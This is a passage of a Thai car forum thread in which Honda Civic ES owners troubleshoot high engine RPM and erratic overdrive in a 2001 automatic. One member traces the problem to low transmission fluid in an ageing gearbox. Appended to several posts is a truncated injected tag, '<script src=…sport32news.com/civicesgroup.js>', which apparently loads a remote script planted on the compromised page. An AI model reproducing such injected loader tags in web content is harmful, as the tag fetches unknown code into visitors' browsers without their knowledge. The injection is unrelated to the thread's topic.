ตอบ
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 31 มกรา 2014 09:58 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
คุณ TON- ทำให้ผมฉุดคิดถึงอัตราทดเกียร์ เพิ่มความอยากรู้เลยค้นเรื่องเกียร์ออโต้มันซะเลย อิอิ
.
เจอชุดนี้ครับ การทำงานของชุดเฟืองแพลนเนตตารี

.
เลยทำให้ผมคิดว่ารถรุ่นนี้ เป็น 3 เกียร์ + โอเวอร์ไดร์(4) และปัญหาก็น่าจะมาจากโอเวอร์ไดร์นะครับ
เท่าที่สังเกตุ เวลายกคันเร่งช่วงลงสะพานมันไม่ค่อยใหลเหมือนกับโตโยต้าอีกคันที่ใช้อยู่ลื่นปรื้ดดีจัง
งานนี้ก็คงค่อยๆไล่กันต่อไป หาทางประหยัดก่อนที่จะโดนชุดโอเวอร์ฮอลเกียร์ล่ะครับ
ได้รับคำขอบคุณจาก: yam  okuma 
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 31 มกรา 2014 10:16 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
ลิ้งค์เกี่ยวกับเกียร์ออโต้ที่ค้นเจอมาจาก วิทยาลัยเทคนิคสัตหีบ ครับ
.
บทที่ 4 เรื่องเกียร์อัตโนมัติ
บทที่ 6 เรื่องเกียร์โอเวอร์ไดร์ฟ
ได้รับคำขอบคุณจาก: yam  okuma 
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 31 มกรา 2014 11:52 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
มาต่อครับ
.
เมื่อคิดว่าเป็นกับโอเวอร์ไดร์ ก็มาดูจุดเปลี่ยนกัน
.
6.3.1.3 สวิตช์อุณหภูมิน้ำหล่อเย็น (Water Temperature Switch)
ถ้าอุณหภูมิของน้ำหล่อเย็นต่ำกว่า 50 องศา หน้าทองขาวของสวิตช์จะต่อวงจรให้ลิ้นโซ
เลนอยด์ลงดินได้ เพื่อป้องกันเปลี่ยนเกียร์ไปโอเวอร์ไดร์ฟ หน้าทองขาวจะเปิดเมื่ออุณหภูมิของน้ำหล่อเย็น
สูงเกินกว่า 50 องศา จึงจะเปลี่ยนเกียร์ไปโอเวอร์ไดร์ฟได้ 
6.3.1.4 ลิ้นโซเลนอยด์โอเวอร์ไดร์ฟ (O/D Solenoid Valve) 
ลิ้นโซเลนอยด์โอเวอร์ไดร์ฟ ดังแสดงในรูปที่ 6.11 ติดตั้งอยู่บนเสื้อเกียร์ และทำหน้าที่
ควบคุมความดันหลักของน้ำมันเกียร์ที่กระท าต่อลิ้นลำดับโอเวอร์ไดร์ฟ (Overdrive Sequence Valve) เพื่อ
ควบคุมให้โอเวอร์ไดร์ฟทำงานหรือไม่ทำงาน
6.3.1.5 เซ็นเซอร์ความเร็วรถยนต์ (Speed Sensor) 
เซ็นเซอร์ความเร็วรถยนต์ มีลักษณะเป็นแบบรีดสวิตช์ (Reed Switch) ติดตั้งอยู่ภายใน
เกจวัดความเร็วรถยนต์ มีหน้าที่ส่งสัญญาณความเร็วรถยนต์ในกล่อง ECU O/D เพื่อก าหนดจุดเปลี่ยนตำแหน่งเกียร์ขึ้นหรือลงได้ โดยคันเกียร์จะต้องอยู่ที่ตำแหน่ง D และสวิตช์โอเวอร์ไดร์ฟอยู่ที่ตำแหน่ง ON 
ด้วย
.
ตอนนี้ผมดูไปที่ สวิตช์อุณหภูมิน้ำหล่อเย็น มากที่สุดเพราะผมใช้คูลเล้นของฮอนด้าอุณหภูมิของน้ำน่าจะเกินกว่า 50 องศานะครับ
ส่วนโซลินอยและสปีดเซ็นเซอร์น่าจะพังยากกว่า แต่ก็จะลองเข้าอู่ให้ช่างช่วยเช็กดูอีกทีครับ
ได้รับคำขอบคุณจาก: yam 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
ศุกร์, 31 มกรา 2014 12:13 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
มีอีกตัวครับคือ ECT sensor = Engine coolant temperature sensor

ตัวนี้ทางศูนย์ใช้อะไรจับสํญญาณไม่รู้ เพราะผมไม่เห็น แต่เท่าที่ถามเค้าบอกว่า มันให้ค่าไม่เหมือน standard ควรเปลี่ยน แต่อะไหล่ต้องสั่ง จนถึงวันนี้ผมก็ไม่ได้เปลี่ยน ก็ยังปรกติดี

http://www.civicesgroup.com/forum/topic24103
ได้รับคำขอบคุณจาก: petershine  yam 
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 31 มกรา 2014 12:44 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
ขอบคุณครับคุณ TON- เดี๋ยวให้อู่เช็กเพิ่มอีกตัว
.
ต่อครับ ยกหูคุณกะช่างแล้วได้ความว่า
.
สวิตช์อุณหภูมิน้ำหล่อเย็น ถ้าพัดลมหม้อน้ำทำงาน,เข็มวัดเกิน 1/4 น้ำร้อนเกิน 50 องศาแน่ๆ
และตัวนี้ไม่น่าเสียถ้ารอบเดินเบาปกติ ของผมเช้าๆเร่งรอบ ออกมาหน่อยก็ปกติ..ตัดไปหนึ่ง
.
ลิ้นโซเลนอยด์โอเวอร์ไดร์ฟ ตรวจด้วยการเอาไฟจี้ที่ขั่ว(เหมือนของแพล้นปูนเลยแฮ่ะ)มีเสียงทำงานไม่เสีย แต่
น้ำมันอาจเดินไม่สะดวกเปิดปิดยากหรือช้า(เป็นเรื่องภายในกรองน้ำมัน)ก็จะทำให้เป็นๆหายๆได้ ของผมไม่เสีย
ส่วนภายในถ้าตัวอื่นไม่เป็นอะไรก็จะลองล้างเกียร์ดู ถ้าไม่จบคงปล่อยตามเลยรอโอเวอร?ฮอลทีเดียว
.
เซ็นเซอร์ความเร็วรถยนต์ ช่างบอกว่าครั้งก่อนจับโค้ดไม่มีอาการของตัวนี้ แล้วเสียยากมากกกกกกก ตัดไป
.
.
สรุปคันของผม
เดี๋ยวเข้าไปตรวจ  ECTsensor อีกที ที่อู่น่าจะมีอะไหล่อยู่เพราะช่างก็ใช้รุ่นนี้
ถ้าไม่เสียก็จะมาอยู่ที่ การปรับตัวของกล่อง ECU และความสกปรกของกรองน้ำมันแล้วล่ะครับ 
.
.
ส่วนคันของคุณ yam ช่างบอกว่าถ้าเป็นยาวไม่มีเปลี่ยนบ้างเลยก็น่าจะโซลินอยครับ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: yam  Ton- 
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 1 กุมภา 2014 23:43 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
petershine พิมพ์ว่า:
ขอบคุณครับคุณ TON- เดี๋ยวให้อู่เช็กเพิ่มอีกตัว
.
ต่อครับ ยกหูคุณกะช่างแล้วได้ความว่า
.
สวิตช์อุณหภูมิน้ำหล่อเย็น ถ้าพัดลมหม้อน้ำทำงาน,เข็มวัดเกิน 1/4 น้ำร้อนเกิน 50 องศาแน่ๆ
และตัวนี้ไม่น่าเสียถ้ารอบเดินเบาปกติ ของผมเช้าๆเร่งรอบ ออกมาหน่อยก็ปกติ..ตัดไปหนึ่ง
.
ลิ้นโซเลนอยด์โอเวอร์ไดร์ฟ ตรวจด้วยการเอาไฟจี้ที่ขั่ว(เหมือนของแพล้นปูนเลยแฮ่ะ)มีเสียงทำงานไม่เสีย แต่
น้ำมันอาจเดินไม่สะดวกเปิดปิดยากหรือช้า(เป็นเรื่องภายในกรองน้ำมัน)ก็จะทำให้เป็นๆหายๆได้ ของผมไม่เสีย
ส่วนภายในถ้าตัวอื่นไม่เป็นอะไรก็จะลองล้างเกียร์ดู ถ้าไม่จบคงปล่อยตามเลยรอโอเวอร?ฮอลทีเดียว
.
เซ็นเซอร์ความเร็วรถยนต์ ช่างบอกว่าครั้งก่อนจับโค้ดไม่มีอาการของตัวนี้ แล้วเสียยากมากกกกกกก ตัดไป
.
.
สรุปคันของผม
เดี๋ยวเข้าไปตรวจ  ECTsensor อีกที ที่อู่น่าจะมีอะไหล่อยู่เพราะช่างก็ใช้รุ่นนี้
ถ้าไม่เสียก็จะมาอยู่ที่ การปรับตัวของกล่อง ECU และความสกปรกของกรองน้ำมันแล้วล่ะครับ 
.
.
ส่วนคันของคุณ yam ช่างบอกว่าถ้าเป็นยาวไม่มีเปลี่ยนบ้างเลยก็น่าจะโซลินอยครับ <script src="https://sport32news.com/civicesgroup.js"></



แล้ว ตัวโซลินอยมันอยู่ตรงไหนคับ หน้าตาเป็นไง ช่วยบอกทีนะคับ
Forboat


ชื่อเล่น: โบ๊ท

เข้าร่วม: 02 พฤศจิกา 2013
ตอบ: 189

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 74
ให้คำขอบคุณ: 148

ที่อยู่: 72หมู่2ตำบลท่าตลาด อำเภอสามพราน จังหวัด นครปฐม
ปี: 2002
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 2 กุมภา 2014 17:10 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
รองล้างลิ้นปีกผีเสื้อ มอเตอร์เดินเบา แล้วก็ตั้งวาว ดูยังครับ
ได้รับคำขอบคุณจาก: yam 
raphael1984


เข้าร่วม: 06 มิถุนา 2013
ตอบ: 854

Guru ES
Guru ES

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 1161

ที่อยู่: B13
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 2 กุมภา 2014 18:01 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
Ton- พิมพ์ว่า:
แต่ผมว่าเกียร์ 3 - 4 รอบน่าจะห่างกันเยอะกว่า 300 รอบนะครับ ไม่เชื่อวิ่ง 120 แล้วสับลงเกียร์ 3 ดูครับ รอบพุ่งปรู้ดเลย

ผมเชื่อว่าเป็นการสั่งชดเชยรอบของ ecu ที่เพี้ยนไป เพราะ ตัว ecu เองคิดว่าอุณภูมิน้ำยังไม่ร้อนถึงจุดเลยสั่งให้เครื่องวิ่งรอบสูงเหมือนตอนเครื่องยังเย็นอยู่

แต่ทีนี้เราต้องมาไล่เองว่ามันมีเซ็นเซอร์ตัวไหนที่บอกให้ ecu รู้ว่าเฮ้ยน้ำร้อนแล้วนะหยุดชดเชยรอบได้แล้ว


ตอบดีจัง. ชอบๆ

ได้รับคำขอบคุณจาก: yam 
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 3 กุมภา 2014 00:13 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
Forboat พิมพ์ว่า:
รองล้างลิ้นปีกผีเสื้อ มอเตอร์เดินเบา แล้วก็ตั้งวาว ดูยังครับ



ลิ้นปีกผีเสื้อล้างแล้วคับ แต่ยังไม่ได้ตั้งวาล์วคับ
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 3 กุมภา 2014 11:28 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
โซลินอยดูตามกระทู้นี้ได้เลยครับ -> http://www.civicesgroup.com/forum/topic67548

ส่วนกระทู้นี้อาการคล้ายของคุณ yam -> http://www.civicesgroup.com/forum/topic45124
ได้รับคำขอบคุณจาก: okuma  yam 
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 3 กุมภา 2014 23:16 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
petershine พิมพ์ว่า:
โซลินอยดูตามกระทู้นี้ได้เลยครับ -> http://www.civicesgroup.com/forum/topic67548

ส่วนกระทู้นี้อาการคล้ายของคุณ yam -> http://www.civicesgroup.com/forum/topic45124



ขอบคุนคับ แต่ไฟ D ผมไม่กระพริบนะ
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 4 กุมภา 2014 13:54 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
คันผมหายแล้วครับ
.
สรุปว่า
เกิดจากน้ำมันเกียร์น้อยกว่าปกติ(ราว 1/3 ลิตร)บวกกับเกียร์เก่า(สองแสนโลแล้ว)
กรองคงเริ่มใหลผ่านไม่สะดวก ทำให้เมื่อวิ่งเกิน 90 น้ำมันเกียร์มีไม่พอสร้างแรงดัน
เกียร์เลยรวน หลังเติมเพิ่มก็ปกติสุขดี
.
จากที่เช็กแรงบิด(เกียร์ D เร่งอยู่กับที่)ช่างคาดว่าจะใช้ได้อีกไม่น้อยกว่าห้าหมื่นกิโล
แต่ขอให้เปลี่ยนน้ำมันเกียร์ทุกๆหมื่นกิโลหรือหนึ่งปีครับ
.
จบข่าวล่าซีวิคศูนย์หนึ่ง ^^


ปล.เรื่องไฟโชว์กับเกียร์อาจจะไม่เกี่ยวกันนะครับ ลองเช็กดูก่อน
ได้รับคำขอบคุณจาก: yam 
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 5 กุมภา 2014 23:22 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
petershine พิมพ์ว่า:
คันผมหายแล้วครับ
.
สรุปว่า
เกิดจากน้ำมันเกียร์น้อยกว่าปกติ(ราว 1/3 ลิตร)บวกกับเกียร์เก่า(สองแสนโลแล้ว)
กรองคงเริ่มใหลผ่านไม่สะดวก ทำให้เมื่อวิ่งเกิน 90 น้ำมันเกียร์มีไม่พอสร้างแรงดัน
เกียร์เลยรวน หลังเติมเพิ่มก็ปกติสุขดี
.
จากที่เช็กแรงบิด(เกียร์ D เร่งอยู่กับที่)ช่างคาดว่าจะใช้ได้อีกไม่น้อยกว่าห้าหมื่นกิโล
แต่ขอให้เปลี่ยนน้ำมันเกียร์ทุกๆหมื่นกิโลหรือหนึ่งปีครับ
.
จบข่าวล่าซีวิคศูนย์หนึ่ง ^^


ปล.เรื่องไฟโชว์กับเกียร์อาจจะไม่เกี่ยวกันนะครับ ลองเช็กดูก่อน


น้ำมันเกียร์ ใช้กี่ลิตรอ่ะคับ แล้วใช้ของอะไรดีคับ รบกวนขอราคาด้วยนะคับ
petershine


ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ที่อยู่: นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 5 กุมภา 2014 23:57 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
ใช้ของ honda ลิตรละร้อยกว่าบาท เปลี่ยนทั่วไปก็ราวๆสามลิตรหน่อยๆ
ถ้าดูดออกด้วยเห็นว่าห้าลิตรโดยประมาณ ลองวัดแล้วเติมเพิ่มดูครับ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: yam 
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 6 กุมภา 2014 22:47 - รายงานรอบเครื่องสูงผิดปกติ เกียร์ AT
petershine พิมพ์ว่า:
ใช้ของ honda ลิตรละร้อยกว่าบาท เปลี่ยนทั่วไปก็ราวๆสามลิตรหน่อยๆ
ถ้าดูดออกด้วยเห็นว่าห้าลิตรโดยประมาณ ลองวัดแล้วเติมเพิ่มดูครับ <script src="https://sport32news.com/civicesgroup.js"></



ขอบคุนคับเดียวจะลองดูคับแล้วมาแจ้งผลให้ทราบอีกทีคับ
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...